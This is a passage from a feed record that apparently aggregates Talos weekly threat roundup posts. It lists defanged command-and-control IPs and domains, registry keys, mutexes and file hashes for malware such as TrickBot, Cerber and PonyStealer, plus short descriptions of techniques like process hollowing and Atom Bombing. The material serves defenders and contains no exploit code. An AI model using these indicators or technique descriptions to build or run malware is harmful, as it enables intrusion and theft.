37ead0eac4578acd43bca94f7c952ca0ba292501902f3c24e2867d4c76987394 7271bdf260d1c23f06c6900ae8627662ae10029d1807128307bdfdaf216ec717 797903efd668c3b3f81419f0f14ed2c1877f051b237ca186f17559a536334d5c 7acad96af327bcdb132c8050fc85323173ac58b1efe91cadb529d2f9b4d98b27 82a312a0219ad8597a6d23b707103bbc5e5ba5a8f05754bf2c4904d857cd4c17 ab0bd0ecb30c8097d5270d8f4a093587dc92ac8b129a169c0488d74ad8a67037 b0b20a68922dc981bf2a4dcdda0545c0f870331a6eef2dc474fefe4d2e7af806 b7e3127dc7f2729513628861b8ee60609a1c20eedcd9b6551314dd0eeedd817e beaa66c363f78e7bae7d9e16fdfaa2bad12a568db71f59a87ecfb675e8fef110 cef415b47d807cb26e0881d6d79ac1ab4cbb77e1671cdcb5804982309481a18d `\n\n#### Coverage\n\nProduct | Protection \n---|--- \nAMP |  \nCloudlock | N/A \nCWS |  \nEmail Security |  \nNetwork Security | N/A \nStealthwatch | N/A \nStealthwatch Cloud | N/A \nThreat Grid |  \nUmbrella | N/A \nWSA | N/A \n \n#### Screenshots of Detection\n\n#### AMP\n\n[](<https://1.bp.blogspot.com/-rHmOGYUnn3s/XkblI9uCPbI/AAAAAAAADTA/hTPnFRS2Is41M-ewgT-M8IsL59hsFItgwCLcBGAsYHQ/s1600/b0b20a68922dc981bf2a4dcdda0545c0f870331a6eef2dc474fefe4d2e7af806_amp.png>)\n\n \n\n\n#### ThreatGrid\n\n[](<https://1.bp.blogspot.com/-7yDofoCL-Fs/XkblNUumwAI/AAAAAAAADTE/BxQtrDXc0y4VUTtwioNP4Kxhg7C8kP9NACLcBGAsYHQ/s1600/b0b20a68922dc981bf2a4dcdda0545c0f870331a6eef2dc474fefe4d2e7af806_tg.png>)\n\n \n\n\n \n\n\n* * *\n\n### PUA.Win.Trojan.Bladabindi-7581164-0\n\n#### Indicators of Compromise\n\nRegistry Keys | Occurrences \n---|--- \n`<HKCU>\\ENVIRONMENT \nValue Name: SEE_MASK_NOZONECHECKS ` | 17 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\WINLOGON \nValue Name: ParseAutoexec ` | 17 \n`<HKCU>\\SOFTWARE\\7261D3F24AE2C8DCAF22FAF7FCF1CAFD ` | 17 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: 7261d3f24ae2c8dcaf22faf7fcf1cafd ` | 17 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: 7261d3f24ae2c8dcaf22faf7fcf1cafd ` | 17 \n`<HKCU>\\SOFTWARE\\7261D3F24AE2C8DCAF22FAF7FCF1CAFD \nValue Name: [kl] ` | 17 \nMutexes | Occurrences \n---|--- \n`qazwsxedc` | 17 \n`7261d3f24ae2c8dcaf22faf7fcf1cafd` | 17 \nDomain Names contacted by malware. Does not indicate maliciousness | Occurrences \n---|--- \n`shareefboy[.]ddns[.]net` | 17 \nFiles and or directories created | Occurrences \n---|--- \n`%HOMEPATH%\\Start Menu\\Programs\\Startup\\x.vbs` | 16 \n`%TEMP%\\server.exe` | 17 \n`%APPDATA%\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\x.vbs` | 16 \n`\\423002248.exex (copy)` | 1 \n`%TEMP%\\server.exex (copy)` | 17 \n \n#### File Hashes\n\n` 00cf99575699bc66ebbb6420a94c31ed8acad4107031546e04f9576546c276e5 245938f3b18f371c90e5403b454cadfa791d97767d9aa05439d6b852fbffd714 285cb077ca516c336a1636182069e7cf9a8a057a267efa376ebede4c0a2cd0bf 29dba26459bba5b186f1bf1c0a0fffc0e393a6d4cc427c842a4aee0353518a2c 2de7a2aa518ea9e0fbc421761c85be589c27c88c3038fa4fa93bef51bacd67bd 344204f0902906b808c5f81ae62b455a3d0ded3034fca548230cd51c59f02ec4 388bfe746f61ade70292f8740d1c92c6eceaa21baa5e04de0ebc012dbed312e7 66d6a4049df4e8bc2fd9c615af0bc3d0ae715ea5b17c5222980f67bd6d57d75e 7d2e2395490ac37029cd98039afa8991f718c5121b1e6e326713e99c26aacb28 8e7ea6439f856525f2affc885f93a23e2f7ade71aecc69c8cd78e5460d4aa58b ae078923fc539c22a7eff4491301ae2c8f438e79a02226e6604b7035aff34ec5 aee215905b39a4a4cc85be54bda2ae9ded42e06fe0b3813a1794052a12e09757 c7a9a427985e84f296370c466eb675ff01b06992416ac9250c385cfaa5a9678d d2af08616f7d2dc0f68d75376d3164867732871348c8101aa0319c90062f999b d75a26758530f775943a9d16680ee4c37e913ab20d6953e965ae41f3e5fd3a88 d7ec97fb65437711f6dd0ce71e8cab70946d2c8f51566446a8fe8e8b64cbda62 fd05573a8360e8054c0ebc38c5cdd107e68b9694525829e832a3085c7d9a556b `\n\n#### Coverage\n\nProduct | Protection \n---|--- \nAMP |  \nCloudlock | N/A \nCWS |  \nEmail Security |  \nNetwork Security | N/A \nStealthwatch | N/A \nStealthwatch Cloud | N/A \nThreat Grid |  \nUmbrella | N/A \nWSA | N/A \n \n#### Screenshots of Detection\n\n#### AMP\n\n[](<https://1.bp.blogspot.com/-W5F1RN8Tm7I/Xkblcv7o31I/AAAAAAAADTM/tWcW6CL0BuE_G9-sU9ew3Pe1cB9SjFz-wCLcBGAsYHQ/s1600/7d2e2395490ac37029cd98039afa8991f718c5121b1e6e326713e99c26aacb28_amp.png>)\n\n \n\n\n#### ThreatGrid\n\n[](<https://1.bp.blogspot.com/-ySnPmdkZ4R0/XkblhtE_bmI/AAAAAAAADTU/SW1w7x44-dYrOt3fVXzasbj_YktfYNZnACLcBGAsYHQ/s1600/7d2e2395490ac37029cd98039afa8991f718c5121b1e6e326713e99c26aacb28_tg.png>)\n\n \n\n\n \n\n\n* * *\n\n### Win.Packed.Ponystealer-7581286-0\n\n#### Indicators of Compromise\n\nRegistry Keys | Occurrences \n---|--- \n`<HKCU>\\SOFTWARE\\WINRAR \nValue Name: HWID ` | 17 \n`<HKCU>\\SOFTWARE\\WINRAR ` | 17 \n`<HKLM>\\SAM\\SAM\\DOMAINS\\ACCOUNT\\USERS\\000003E9 \nValue Name: F ` | 17 \n`<HKLM>\\SAM\\SAM\\DOMAINS\\ACCOUNT\\USERS\\000001F5 \nValue Name: F ` | 17 \n`<HKLM>\\SAM\\SAM\\DOMAINS\\ACCOUNT\\USERS\\000003EC \nValue Name: F ` | 17 \nIP Addresses contacted by malware. Does not indicate maliciousness | Occurrences \n---|--- \n`194[.]4[.]56[.]252` | 17 \n`212[.]129[.]7[.]131` | 1 \nDomain Names contacted by malware. Does not indicate maliciousness | Occurrences \n---|--- \n`myp0nysite[.]ru` | 17 \n`streetcode3[.]com` | 1 \nFiles and or directories created | Occurrences \n---|--- \n`%HOMEPATH%\\Start Menu\\Programs\\Startup\\filename.vbe` | 1 \n`%APPDATA%\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\filename.vbe` | 17 \n`%APPDATA%\\subfolder` | 17 \n`%APPDATA%\\subfolder\\filename.bat` | 17 \n`%TEMP%\\811953.bat` | 1 \n`%TEMP%\\-1509909074.bat` | 1 \n \n#### File Hashes\n\n` 13400f8d7c8a12d8958a46992e9eed2b2f1151ae33fcd0c248bc35e58cfb7ce5 182f6e283a097173aaedb18790a25cf8d923918e715568b88446a345d086fcc0 2c20c1f5d4995dcccf424f00ceb0ed472cb4565ee7b06c9cb70b08b478eaf2f1 2deca9e99719e851fd53cee5ac5dfbd07b119bc707b7aa81cb55c38c8883a772 3182728acec97bc151ebae0a6adfac92ab26acf0c5aa1ab5194926b5e36f4d43 5a4373916b36d08a40753dbcdac9f5a4463ce04e34c9d91370ed3eb26d9e02ee 73ef9e3fd88857d97750893acb03308bb1deb980ca8ca601087bb9a1f74362a6 8dfce3b2ccb67e4d7fe864898a1464f74a536e14bd4104dff9de8c399d42c2b7 8fe9aeaa722e13e842520e578ed099670bc59c882b59a6fb413dc6fcf590665a 955b6ea1a4087486a22b60ca2453343b04ac01e5c161615b13fd8bd22192c76d 9a10bb237ac45ffee5878cdfe094a0b0f6f81d9eba8ec21033b8020391c1324f bd4aa94a35201221e31df703e1140180c8f310ce7f08b81960185a2b784a98c0 ce3e0e36ac012f0f464181de7a21c87bfa1c5c334a11b7569ddb5dd4222c95e6 d07112d2911677ee1e1722bd168dff54d480c3ce8a9f78a84bf3339a885b0174 e2546be50a578b421d55de25bb7d7aff0ef84b5246d1d7d6f8ca8908da415ef4 e48083bef42265f0c16b3cb6fef65a4206f152b3cfdb28f517e15ca8a660ffed fe83421fb5c10e194127d3b3d02e4bf2d1d951291bd935641d80f19bbf6ba620 `\n\n#### Coverage\n\nProduct | Protection \n---|--- \nAMP |  \nCloudlock | N/A \nCWS |  \nEmail Security |  \nNetwork Security |  \nStealthwatch | N/A \nStealthwatch Cloud | N/A \nThreat Grid |  \nUmbrella |  \nWSA |  \n \n#### Screenshots of Detection\n\n#### AMP\n\n[](<https://1.bp.blogspot.com/-ZzGH1lfQaOM/Xkbl1DWh3cI/AAAAAAAADTg/5TealMCAQCwGV1Zr6ljcNU2rdZHiVw1ZACLcBGAsYHQ/s1600/182f6e283a097173aaedb18790a25cf8d923918e715568b88446a345d086fcc0_amp.png>)\n\n \n\n\n#### ThreatGrid\n\n[](<https://1.bp.blogspot.com/-61hbPOtrq-I/Xkbl5sOFfsI/AAAAAAAADTk/0gll55PTzw8pVUvAL9kP9MMil-bAEgOKwCLcBGAsYHQ/s1600/182f6e283a097173aaedb18790a25cf8d923918e715568b88446a345d086fcc0_tg.png>)\n\n \n\n\n#### Umbrella\n\n[](<https://1.bp.blogspot.com/-fPRNlwGrXtI/Xkbl_YvhU1I/AAAAAAAADTo/bpbeNHbR40kZwAtGk5U5wxxoMD39ioBIACLcBGAsYHQ/s1600/816593fbb5469d27ac05c4eeaed262ce5486ceef3aa50f6a5991dbf87e0b6e29_umbrella.png>)\n\n \n\n\n \n\n\n* * *\n\n### Win.Ransomware.Cerber-7582361-0\n\n#### Indicators of Compromise\n\nRegistry Keys | Occurrences \n---|--- \n`<HKCU>\\CONTROL PANEL\\DESKTOP \nValue Name: TileWallpaper ` | 7 \n`<HKCU>\\CONTROL PANEL\\DESKTOP \nValue Name: WallpaperStyle ` | 7 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\SPEECH\\VOICES \nValue Name: DefaultTokenId ` | 6 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\CONTROL\\SESSION MANAGER ` | 6 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\SPEECH\\VOICES ` | 6 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\CONTROL\\SESSION MANAGER \nValue Name: PendingFileRenameOperations ` | 6 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: {32382BC4-48A5-6DE8-F0EE-B8109DEC3228} ` | 2 \nMutexes | Occurrences \n---|--- \n`shell.{<random GUID>}` | 8 \nIP Addresses contacted by malware. Does not indicate maliciousness | Occurrences \n---|--- \n`13[.]107[.]21[.]200` | 2 \n`204[.]79[.]197[.]200` | 3 \n`15[.]49[.]2[.]0/27` | 8 \n`122[.]1[.]13[.]0/27` | 8 \n`194[.]165[.]17[.]0/25` | 8 \n`95[.]213[.]195[.]123` | 2 \n`91[.]142[.]90[.]61` | 7 \n`31[.]41[.]47[.]50` | 5 \n`31[.]41[.]47[.]31` | 1 \n`195[.]19[.]192[.]99` | 2 \nDomain Names contacted by malware. Does not indicate maliciousness | Occurrences \n---|--- \n`maxcdn[.]bootstrapcdn[.]com` | 1 \n`get[.]adobe[.]com` | 4 \n`en[.]wikipedia[.]org` | 14 \n`www[.]torproject[.]org` | 7 \n`www[.]collectionscanada[.]ca` | 7 \n`alpha3[.]suffolk[.]lib[.]ny[.]us` | 7 \n`www[.]archives[.]gov` | 7 \n`www[.]vitalrec[.]com` | 7 \n`www[.]cdc[.]gov` | 7 \n`hldsfuh[.]info` | 1 \n`mmteenijjjuyoqju[.]info` | 1 \n`ydgsjrjqotlffitfg[.]org` | 1 \n`dxpmkdipp[.]info` | 1 \n`cojkhmdxrwvxwxa[.]pw` | 1 \n`qgilcuym[.]org` | 1 \n`www[.]multicounter[.]de` | 9 \n`pqhwfeeivtkxi[.]click` | 5 \n`othcijmuhwb[.]pl` | 4 \n`iconhrdqmeueg[.]su` | 2 \n`cdwguymjxnyot[.]pl` | 3 \n`veiqvqirdhmyis[.]org` | 4 \n`qoaouhgwfy[.]biz` | 2 \n`hkwyfnevdievebgjx[.]xyz` | 2 \n`ligumssfsrtfpy[.]xyz` | 4 \n`rqtcmltkurtev[.]pw` | 2 \n \n*See JSON for more IOCs\n\nFiles and or directories created | Occurrences \n---|--- \n`%HOMEPATH%\\Contacts\\Administrator.contact` | 15 \n`%TEMP%\\d19ab989\\4710.tmp` | 8 \n`%TEMP%\\d19ab989\\a35f.tmp` | 8 \n`\\MSOCache\\All Users\\{90140000-00A1-0409-0000-0000000FF1CE}-C\\_14-INSTRUCTION.html` | 7 \n`\\MSOCache\\All Users\\{90140000-00BA-0409-0000-0000000FF1CE}-C\\_15-INSTRUCTION.html` | 7 \n`\\MSOCache\\All Users\\{90140000-0115-0409-0000-0000000FF1CE}-C\\_16-INSTRUCTION.html` | 7 \n`\\MSOCache\\All Users\\{90140000-0116-0409-1000-0000000FF1CE}-C\\_17-INSTRUCTION.html` | 7 \n`\\MSOCache\\All Users\\{90140000-0117-0409-0000-0000000FF1CE}-C\\Access.en-us\\_18-INSTRUCTION.html` | 7 \n`\\MSOCache\\All Users\\{90140000-0117-0409-0000-0000000FF1CE}-C\\_19-INSTRUCTION.html` | 7 \n`\\MSOCache\\All Users\\{91140000-0011-0000-0000-0000000FF1CE}-C\\_20-INSTRUCTION.html` | 7 \n`%ProgramData%\\Adobe\\Updater6\\_21-INSTRUCTION.html` | 7 \n`%ProgramData%\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\_22-INSTRUCTION.html` | 7 \n`%ProgramData%\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\_24-INSTRUCTION.html` | 7 \n`%ProgramData%\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\_26-INSTRUCTION.html` | 7 \n`%ProgramData%\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\en-US\\_25-INSTRUCTION.html` | 7 \n`%ProgramData%\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\_28-INSTRUCTION.html` | 7 \n`%ProgramData%\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\en-US\\_27-INSTRUCTION.html` | 7 \n`%ProgramData%\\Microsoft\\IlsCache\\_29-INSTRUCTION.html` | 7 \n`%ProgramData%\\Microsoft\\Network\\Downloader\\_46-INSTRUCTION.html` | 7 \n`%ProgramData%\\Microsoft\\OfficeSoftwareProtectionPlatform\\Cache\\_45-INSTRUCTION.html` | 7 \n`%ProgramData%\\Microsoft\\OfficeSoftwareProtectionPlatform\\_48-INSTRUCTION.html` | 7 \n`%ProgramData%\\Microsoft\\RAC\\PublishedData\\_44-INSTRUCTION.html` | 7 \n`%ProgramData%\\Microsoft\\RAC\\StateData\\_41-INSTRUCTION.html` | 7 \n`%ProgramData%\\Microsoft\\User Account Pictures\\Default Pictures\\_33-INSTRUCTION.html` | 7 \n`%ProgramData%\\Microsoft\\User Account Pictures\\_34-INSTRUCTION.html` | 7 \n \n*See JSON for more IOCs\n\n#### File Hashes\n\n` 0670326e0572ca61e6a1f9b654088f5ac91fd3426dcba932377c801763fe5906 085198d732095e24f5165d61636930cb1012b833278d86565a66d23dd0ffce96 14f9231bd987060133bc1e2908a9a5691e829d6f2cc43010f943e4070b0102cf 2f5776b368011a76db2c690252846d0e3a90ccd27d9575e015663cebaf58db23 5815f647ad348de649c3ebfb5f1987e305410855cc944d14b1284abaaa40d9e3 593ead1c717d2ca3ed32fa98da70f4df7e0a99431d0327fc08c363621afc1fbe a515545e6056e1a9f75a4f7d0afefb54bf7e1ffb1e5f7f6641cece38db7e6cf0 bebd3b1683b69a383af7689f70ad3e3992630e0fc07d98e2e014f4978136722a c11b9d1ba0badcc063eb6e60894b7f4f0932e4f73d037f05e06c80d72833b328 c4cfc1a33b5e956376c773674c1a8baa318832f2d75fac9efe53fbc895ace7da cb73396e304937a404c63ad696c6e2d269f38d8082d636e2c16e550f1f7cb118 cd8b407e19e2d93dfc939cd04e3a43100d2442128f42c226ac1dedeba0da4824 d2377ff809d7d65898523f10b38331edf20c11547776894343e926f6bddf1e39 d6e35e20d5b7fa3d0b5352b4953701cabb4ed2a83d94dc666ef9900b7c53394a d851e224dd46fbf74960d57bf29f8b60157e9b697e5132d5e97abe504f6038a2 d9ddfa571587bd55c75526b8f17e6dbbb8a4b6179bfc002575cdcbf446154e7a fd1e8a916fa218df73894c59784dc94cbd26c7c7a5e1c1ee37ce45b349e4cc2c `\n\n#### Coverage\n\nProduct | Protection \n---|--- \nAMP |  \nCloudlock | N/A \nCWS |  \nEmail Security |  \nNetwork Security |  \nStealthwatch | N/A \nStealthwatch Cloud | N/A \nThreat Grid |  \nUmbrella |  \nWSA |  \n \n#### Screenshots of Detection\n\n#### AMP\n\n[](<https://1.bp.blogspot.com/-ZnBq2sVehBU/XkbmO3anDII/AAAAAAAADT0/wj80al3dA3Ajcuw_6SUUQGjAbQBgazCKwCLcBGAsYHQ/s1600/d851e224dd46fbf74960d57bf29f8b60157e9b697e5132d5e97abe504f6038a2_amp.png>)\n\n \n\n\n#### ThreatGrid\n\n[](<https://1.bp.blogspot.com/-Dcj1XBW55ao/XkbmSCbeXFI/AAAAAAAADT8/pnsmYG6HaCEaZmf3NOYrkEwtxv19k74ngCLcBGAsYHQ/s1600/d851e224dd46fbf74960d57bf29f8b60157e9b697e5132d5e97abe504f6038a2_tg.png>)\n\n \n\n\n#### Umbrella\n\n[](<https://1.bp.blogspot.com/-ex3DbvgX5Ow/XkbmWdet0wI/AAAAAAAADUA/_sFoL3ZJzrMq-GDxOkYCpFiKfjXbT52XgCLcBGAsYHQ/s1600/d2377ff809d7d65898523f10b38331edf20c11547776894343e926f6bddf1e39_umbrella.png>)\n\n \n\n\n#### Malware\n\n[](<https://1.bp.blogspot.com/-jLsjhr0_epY/Xkbmb2rgrAI/AAAAAAAADUE/klXR0xSE4z0KByVybr4Jm2WbNY_XVV7RQCLcBGAsYHQ/s1600/0670326e0572ca61e6a1f9b654088f5ac91fd3426dcba932377c801763fe5906_malware.png>)\n\n \n\n\n \n\n\n* * *\n\n## Exploit Prevention\n\nCisco AMP for Endpoints protects users from a variety of malware functions with exploit prevention. Exploit prevention helps users defend endpoints from memory attacks commonly used by obfuscated malware and exploits. These exploits use certain features to bypass typical anti-virus software, but were blocked by AMP thanks to its advanced scanning capabilities, even protecting against zero-day vulnerabilities. \nCVE-2019-0708 detected \\- (4662) \n--- \nAn attempt to exploit CVE-2019-0708 has been detected. The vulnerability, dubbed BlueKeep, is a heap memory corruption which can be triggered by sending a specially crafted Remote Desktop Protocol (RDP) request. Since this vulnerability can be triggered without authentication and allows remote code execution, it can be used by worms to spread automatically without human interaction. \nExcessively long PowerShell command detected \\- (749) \nA PowerShell command with a very long command line argument that may indicate an obfuscated script has been detected. PowerShell is an extensible Windows scripting language present on all versions of Windows. Malware authors use PowerShell in an attempt to evade security software or other monitoring that is not tuned to detect PowerShell based threats. \nKovter injection detected \\- (319) \nA process was injected into, most likely by an existing Kovter infection. Kovter is a click fraud Trojan that can also act as an information stealer. Kovter is also file-less malware meaning the malicious DLL is stored inside Windows registry and injected directly into memory using PowerShell. It can detect and report the usage of monitoring software such as wireshark and sandboxes to its C2. It spreads through malicious advertising and spam campaigns. \nProcess hollowing detected \\- (206) \nProcess hollowing is a technique used by some programs to avoid static analysis. In typical usage, a process is started and its obfuscated or encrypted contents are unpacked into memory. The parent then manually sets up the first stages of launching a child process, but before launching it, the memory is cleared and filled in with the memory from the parent instead. \nGamarue malware detected \\- (188) \nGamarue is a family of malware that can download files and steal information from an infected system. Worm variants of the Gamarue family may spread by infecting USB drives or portable hard disks that have been plugged into a compromised system. \nAtom Bombing code injection technique detected \\- (133) \nA process created a suspicious Atom, which is indicative of a known process injection technique called Atom Bombing. Atoms are Windows identifiers that associate a string with a 16-bit integer. These Atoms are accessible across processes when placed in the global Atom table. Malware exploits this by placing shell code as a global Atom, then accessing it through an Asynchronous Process Call (APC). A target process runs the APC function, which loads and runs the shellcode. The malware family Dridex is known to use Atom Bombing, but other threats may leverage it as well. \nInstallcore adware detected \\- (105) \nInstall core is an installer which bundles legitimate applications with offers for additional third-party applications that may be unwanted. The unwanted applications are often adware that display advertising in the form of popups or by injecting into browsers and adding or altering advertisements on webpages. Adware is known to sometimes download and install malware. \nDealply adware detected \\- (75) \nDealPly is adware, which claims to improve your online shopping experience. It is often bundled into other legitimate installers and is difficult to uninstall. It creates pop-up advertisements and injects advertisements on webpages. Adware has also been known to download and install malware. \nReverse http payload detected \\- (30) \nAn exploit payload intended to connect back to an attacker controlled host using http has been detected. \nCorebot malware detected \\- (20) \nCorebot is a Trojan with many capabilities found in other prominent families. It features a plugin system to enable it to load a variety of features from the C&amp;C server at any time. Known plugins include RAT capabilities such as taking desktop screenshots, as well as being able to intercept and modify browser communications and steal data, especially data related to banking. \n \n", "modified": "2020-02-14T11:35:23", "published": "2020-02-14T11:35:23", "id": "TALOSBLOG:E339E76DD9CC8BF6BC7108066B44196A", "href": "http://feedproxy.google.com/~r/feedburner/Talos/~3/3m6HBreCgdU/threat-roundup-0207-0214.html", "type": "talosblog", "title": "Threat Roundup for February 7 to February 14", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-10-11T17:29:31", "bulletinFamily": "blog", "cvelist": ["CVE-2019-0708"], "description": "[](<https://1.bp.blogspot.com/-YY2FQl9WGXA/XURYSq-inGI/AAAAAAAAACc/Ko8Q3jzMHrs2tIOdnt-yO6QVWhNtZBrPwCLcBGAs/s1600/recurring%2Bblog%2Bimages_threat%2Broundup.jpg>)\n\nToday, Talos is publishing a glimpse into the most prevalent threats we've observed between Oct. 4 and Oct. 11. As with previous roundups, this post isn't meant to be an in-depth analysis. Instead, this post will summarize the threats we've observed by highlighting key behavioral characteristics, indicators of compromise, and discussing how our customers are automatically protected from these threats. \n \nAs a reminder, the information provided for the following threats in this post is non-exhaustive and current as of the date of publication. Additionally, please keep in mind that IOC searching is only one part of threat hunting. Spotting a single IOC does not necessarily indicate maliciousness. Detection and coverage for the following threats is subject to updates, pending additional threat or vulnerability analysis. For the most current information, please refer to your Firepower Management Center, Snort.org, or ClamAV.net. \n \nFor each threat described below, this blog post only lists 25 of the associated file hashes and up to 25 IOCs for each category. An accompanying JSON file can be found [here](<https://alln-extcloud-storage.cisco.com/ciscoblogs/5da097d613262.txt>)that includes the complete list of file hashes, as well as all other IOCs from this post. As always, please remember that all IOCs contained in this document are indicators, and one single IOC does not indicated maliciousness. \nThe most prevalent threats highlighted in this roundup are: \nThreat Name | Type | Description \n---|---|--- \nWin.Dropper.TrickBot-7288419-0 | Dropper | Trickbot is a banking trojan targeting sensitive information for select financial institutions. This malware is frequently distributed through malicious spam campaigns. Many of these campaigns rely on downloaders for distribution, such as VB scripts. \nWin.Dropper.Qakbot-7287972-0 | Dropper | Qakbot, aka Qbot, has been around since at least 2008. Qbot primarily targets sensitive information like banking credentials but can also steal FTP credentials and spread across a network using SMB. \nWin.Trojan.Emotet-7287811-0 | Trojan | Emotet is one of the most widely distributed and active malware families today. It is a highly modular threat that can deliver a wide variety of payloads. Emotet is commonly delivered via Microsoft Office documents with macros, sent as attachments on malicious emails. \nWin.Worm.Vobfus-7198158-0 | Worm | Vobfus is a worm that copies itself to external drives and attempts to gain automatic code execution via autorun.inf files. It also modifies the registry so that it will run when the system is booted. Once installed, it attempts to download follow-on malware from its command and control (C2) servers. \nWin.Dropper.Upatre-7196259-0 | Dropper | Upatre is a trojan that is often delivered through spam emails with malicious attachments or links. It is known to be a downloader and installer for other malware. \n \n* * *\n\n## Threat Breakdown\n\n### Win.Dropper.TrickBot-7288419-0\n\n#### Indicators of Compromise\n\nMutexes | Occurrences \n---|--- \n`Global\\316D1C7871E10` | 64 \nIP Addresses contacted by malware. Does not indicate maliciousness | Occurrences \n---|--- \n`190[.]152[.]4[.]210` | 17 \n`37[.]228[.]117[.]146` | 9 \n`31[.]184[.]253[.]37` | 9 \n`181[.]113[.]20[.]186` | 6 \n`185[.]222[.]202[.]222` | 6 \n`51[.]68[.]247[.]62` | 5 \n`194[.]5[.]250[.]82` | 5 \n`51[.]254[.]69[.]244` | 5 \n`91[.]132[.]139[.]170` | 5 \n`116[.]203[.]16[.]95` | 4 \n`189[.]80[.]134[.]122` | 4 \n`203[.]23[.]128[.]168` | 4 \n`46[.]30[.]41[.]229` | 4 \n`37[.]44[.]212[.]216` | 4 \n`216[.]239[.]38[.]21` | 3 \n`185[.]248[.]87[.]88` | 3 \n`138[.]59[.]233[.]5` | 3 \n`190[.]154[.]203[.]218` | 3 \n`187[.]58[.]56[.]26` | 3 \n`177[.]103[.]240[.]149` | 3 \n`200[.]21[.]51[.]38` | 3 \n`5[.]230[.]22[.]40` | 3 \n`200[.]153[.]15[.]178` | 3 \n`198[.]27[.]74[.]146` | 2 \n`146[.]196[.]122[.]167` | 2 \n \n*See JSON for more IOCs\n\nDomain Names contacted by malware. Does not indicate maliciousness | Occurrences \n---|--- \n`250[.]5[.]55[.]69[.]zen[.]spamhaus[.]org` | 12 \n`ip[.]anysrc[.]net` | 4 \n`api[.]ip[.]sb` | 3 \n`ipinfo[.]io` | 3 \n`checkip[.]amazonaws[.]com` | 2 \n`wtfismyip[.]com` | 2 \n`api[.]ipify[.]org` | 2 \n`www[.]myexternalip[.]com` | 1 \n`ident[.]me` | 1 \nFiles and or directories created | Occurrences \n---|--- \n`%APPDATA%\\netcloud` | 64 \n`%System32%\\Tasks\\netcloud free disk` | 64 \n`%APPDATA%\\netcloud\\settings.ini` | 64 \n`%APPDATA%\\netcloud\\data\\systeminfo64` | 4 \n`%APPDATA%\\netcloud\\data\\pwgrab64` | 2 \n`%APPDATA%\\netcloud\\data\\pwgrab64_configs\\dpost` | 2 \n \n#### File Hashes\n\n` 01665c3044d0c07559850f4c63b0e83a75d377d47cbb024109af959ab07a84ab 029d508d8b0b8d85d4e9409b4fce7d1e77278e9c287ea413bfc6ef74b04f3f62 02b56e22b5b87c10e1aaa55a64d023c146705bec60a05f663383c58ad2d46ec9 04915554da413b0eec1c972c40dd73f01494e0babbb952511bc471831f09d66a 07037779cf0fd1203023ab1c5d0ca29103ec20b86ef4a1352e0eae887522aaf5 0b0812b19376da99480f2eaa6ef5c50b0ddef28e861d58f72ea2f321d8d5f4a7 11b52fd22db6a8407a7b185bbff4731813f3e5ade255545b0c5aa75e71001d40 139682b035166c0554038c7a3d41d21c1224ca4d8a1f3dc2fdc78b5d162980a3 1452da4d87422fbce37fa81c0357b9093120f39849a39a6b49529d2e88c24601 15e767c8416fff66195618b591a2a2869b42075a81962d760e644504ecbccd7d 1bcc2e0e40cb671020249c818d9580345498198e06e83242ec54c5666c13eeac 1f64de67c63364947a52b85977c30e101cb27151c9d21759db0a7ea2d20d1c76 1fd9de5a0da8baf970b071eec8072dbe8e166c52a520252a7bad4c6cccdb6f5a 2211518528d8df3b3a37b83807f27b3c48e8dc68e427be3d693775dd9281d3dc 2329e7a18e95750266b5865d2cebb2b0ab2db296e99735b1fcf174eabd0364bc 25ed6d3f3dcaa2fb50d9b98b4b18ce5552b8e7f7edb34036dbe223a0e594c61e 28d5358cee665b777f608ab2994f09baeea9f98a53f7631dc18412b58e279e79 2c5e9d6e2caf1b7d0b3d34eefe3f6cba433c5f4d9cb1056788efba86d64070c7 2cb27358ab67c8b99b3ef38653c6e529daf2782415ee4025977853dbecba4135 2fcd6ec5753d814c537cf1d8c0bd40fd71da35fc0daa3464c71061feabccc003 3899c0d52fb831b58971b8cc3676b819623c3cdf394404441e9e3fc5149f2924 39812d745606743e797291736409505e7c8fee6708f1b9cdfd81db696b045f0b 3c0fdeaf8672109d78f05a5409aa4d1a64970e0317d00dce93c2f850ed315444 3ce742d661cf7896361b4419bffe4b457db5996bb437e386ac8725a32ea3775c 3cfd3b1da2d19d3d79479a35570aa2f8c53c5a865307ae39c45dbab34ecd1eb3 `\n\n*See JSON for more IOCs\n\n#### Coverage\n\nProduct | Protection \n---|--- \nAmp |  \nCloudlock | N/A \nCws |  \nEmail Security |  \nNetwork Security |  \nStealthwatch | N/A \nStealthwatch Cloud | N/A \nThreat Grid |  \nUmbrella | N/A \nWsa |  \n \n#### Screenshots of Detection\n\n#### AMP\n\n[](<https://1.bp.blogspot.com/-JTRDz8oSW50/XaCYva53LiI/AAAAAAAACwA/280I47e6txEPYBLQPdpqONY_nKCkzbvWQCLcBGAsYHQ/s1600/2c5e9d6e2caf1b7d0b3d34eefe3f6cba433c5f4d9cb1056788efba86d64070c7_amp.png>)\n\n \n\n\n#### ThreatGrid\n\n[](<https://1.bp.blogspot.com/-KJVTe4bprVI/XaCYzw4H7VI/AAAAAAAACwE/MpNwJCdyIWExayqR9lJI-HVKguGjEsqQACLcBGAsYHQ/s1600/815ba51dcf704f5d77d74f409b6ad6b8196c3f98f51a1f300e9e156597040a1a_tg.png>)\n\n \n\n\n \n\n\n* * 